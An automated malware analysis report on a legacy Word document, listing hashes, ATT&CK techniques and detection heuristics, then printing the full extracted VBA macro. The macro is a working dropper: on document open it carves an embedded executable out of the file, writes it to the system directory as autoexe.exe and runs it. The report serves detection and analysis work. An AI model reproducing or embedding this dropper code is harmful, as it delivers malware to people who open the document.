Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dd9de5fe32546f9f…

MALICIOUS

Office (OLE)

36.0 KB Created: 2004-05-13 02:47:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 98185904ecd20b7042d6516ae69864da SHA-1: c0d66cfa7a12cd73c34dcc2fe0869cefe9bdd853 SHA-256: dd9de5fe32546f9f62500259b333048e1d10139ec676b3cfc9c0c555cade0bf2
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a VBA macro. The 'Document_Open' subroutine calls 'Module1.abc', which in turn uses the 'Shell()' function. This indicates the macro is designed to execute arbitrary commands, a common technique for downloading and executing further malicious stages. The presence of legacy WordBasic auto-exec markers further supports this.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3772 bytes
SHA-256: 20eb6e5f837e665822d13edae6a23acafe63ac54ffe80ae9c6a20ddc51a1f410
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Module1.abc
End Sub

Attribute VB_Name = "Module1"
Option Compare Text

Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, ByVal lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetCurrentDirectory Lib "kernel32" Alias "SetCurrentDirectoryA" (ByVal lpBuffer As String) As Boolean
Declare Function GetFileSize Lib "kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long

Public Const GENERIC_READ As Long = &H80000000
Public Const GENERIC_WRITE As Long = &H40000000
Public Const FILE_SHARE_READ As Long = 1
Public Const FILE_SHARE_WRITE As Long = 2
Public Const CREATE_NEW As Long = 1
Public Const CREATE_ALWAYS As Long = 2
Public Const OPEN_EXISTING As Long = 3
Public Const OPEN_ALWAYS As Long = 4
Public Const TRUNCATE_EXISTING As Long = 5
Public Const INVALID_HANDLE_VALUE As Long = -1
Public Const FILE_ATTRIBUTE_NORMAL As Long = &H80

Public Function abc()


On Error Resume Next
   Dim buffer(65536) As Byte
   Dim h, h2, j, i, k As Long
   Dim sSave As String
   Dim Ret As Long
   Dim Border As Long
   Dim Data(8) As Byte
   Dim FileSize As Long
   Dim Tmp As Byte
   
   
   
    sSave = Space(255)
    Ret = GetSystemDirectory(sSave, 255)
    sSave = Left$(sSave, Ret)
    pathst = sSave & "\autoexe.exe"

   
   h = CreateFile(Application.ActiveDocument.FullName, GENERIC_READ, FILE_SHARE_READ + FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)
   h2 = CreateFile(pathst, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)
   If h = INVALID_HANDLE_VALUE Then
      Exit Function
   End If
        
   FileSize = GetFileSize(h, Border)
   Border = 1
  
   Do
        For i = 1 To 7
            Data(i) = Data(i + 1)
        Next i
        i = ReadFile(h, Tmp, 1, j, 0)
        Data(8) = Tmp
         
        If (Data(1) = &H4D And Data(2) = &H5A) Then ' And Data(3) = &H90 And Data(4) = &H0 And Data(5) = &H3 And Data(6) = &H0 And Data(7) = &H0 And Data(8) = &H0) Then
            Exit Do
        End If
        
        Border = Border + 1
        
   Loop While Border < FileSize
   
   k = SetFilePointer(h, Border - 8, nil, 0)
   Do
      i = ReadFile(h, buffer(0), 65536, j, 0)
      i = WriteFile(h2, buffer(0), j, j, 0)
   Loop Until j < 65536
   
   CloseHandle (h)
   CloseHandle (h2)
    
    j = 0
    Do
     SetCurrentDirectory (sSave)
     j = j + 1
    Loop Until j < 10
    
   Shell (pathst)
   
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.